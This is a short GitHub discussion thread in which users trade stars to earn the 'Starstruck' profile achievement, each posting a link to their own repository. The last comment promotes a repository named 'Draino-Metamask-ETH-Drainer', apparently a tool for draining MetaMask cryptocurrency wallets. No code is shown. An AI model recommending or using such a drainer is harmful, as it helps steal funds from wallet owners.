### DISCUSSION TITLE
Starstruck 🤩 exchange

### DISCUSSION THREAD

**Discussion by DhrubajyotiBiswasfounderofDribll** [Schweinepriester/github-profile-achievements#760] [General]
Can you guys give some stars in my repository: https://github.com/DSoftofficial/Tilder. I will star you back. I want the starstruck achievement.

**Comment by Schweinepriester** [comment]
See https://github.com/Schweinepriester/github-profile-achievements/discussions/722

**Comment by arpittyagi102** [comment]
I starred your repository
Please Star mine : https://github.com/arpittyagirocks/HideandSeek

**Comment by ghost** [comment]
@arpittyagirocks @Schweinepriester @dhrubajyotifounderofDSoft 
starred all, please star back my repo:
https://github.com/darkhackkr/Draino-Metamask-ETH-Drainer
